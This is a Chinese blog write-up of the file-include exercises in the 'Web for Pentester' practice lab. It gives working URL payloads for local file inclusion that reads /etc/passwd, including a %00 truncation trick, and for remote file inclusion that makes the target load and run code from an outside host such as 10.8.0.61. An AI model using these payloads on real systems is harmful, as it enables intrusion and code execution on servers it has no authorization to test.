zoukankan      html  css  js  c++  java
  • Web for pentester_writeup之File Include篇

    Web for pentester_writeup之File Include篇

    ##File Include(文件包涵) ###Example 1

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135652230-964502428.png)

    加一个单引号

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135705087-50141791.png)

    从报错中我们可以获取如下信息: 当前文件执行的代码路径: `/var/www/fileincl/example1.php` 文件包含代码引用函数 `include()` 代码引用的文件路径:`include_path`= `/usr/share/php:/usr/share/pear`

    >Payload 1 (本地文件包含LFI) `http://192.168.219.136/fileincl/example1.php?page=../../../../../../../../etc/passwd`

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135803155-2088724461.png)

    Payload 2 (远程文件包含RFI) http://192.168.219.136/fileincl/example1.php?page=https://assets.pentesterlab.com/test_include.txt

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135812288-1016362721.png)

    其中https://assets.pentesterlab.com/test_include.txt是官方给的一个测试例子,也可以自己构建,在txt中写入想执行的代码

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135821873-1400869374.png)

    ###Example 2

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135841490-291369101.png)

    没有后缀名了,同样添加一个单引号查看报错信息

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135915321-2021662260.png)

    发现函数调用的php文件变成了`include(intro'.php)`,我们可以使用%00截断来实现本地文件包含 >Payload 1 (本地文件包含LFI) `http://192.168.219.136/fileincl/example2.php?page=../../../../../../../../etc/passwd%00`

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135944317-1388578621.png)

    Payload 2 (远程文件包含RFI) http://192.168.219.136/fileincl/example2.php?page=https://assets.pentesterlab.com/test_include.txt?blah= 或者使用&blah=当文件路径传参符号为&号时

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135952093-207954802.png)

    Payload 3 (远程文件包含RFI,也可以在主机10.8.0.61自己构造一个phpinfo.php的文件,去掉后缀访问) http://192.168.219.136/fileincl/example2.php?page=http://10.8.0.61/phpinfo

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135958885-314395672.png)

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808140114651-718114185.png)

  • 相关阅读:
    洛谷p1017 进制转换(2000noip提高组)
    Personal Training of RDC
    XVIII Open Cup named after E.V. Pankratiev. Grand Prix of Eurasia
    XVIII Open Cup named after E.V. Pankratiev. Grand Prix of Peterhof.
    Asia Hong Kong Regional Contest 2019
    XVIII Open Cup named after E.V. Pankratiev. Grand Prix of Siberia
    XVIII Open Cup named after E.V. Pankratiev. Ukrainian Grand Prix.
    XVIII Open Cup named after E.V. Pankratiev. GP of SPb
    卜题仓库
    2014 ACM-ICPC Vietnam National First Round
  • 原文地址:https://www.cnblogs.com/liliyuanshangcao/p/11319905.html
Copyright © 2011-2022 走看看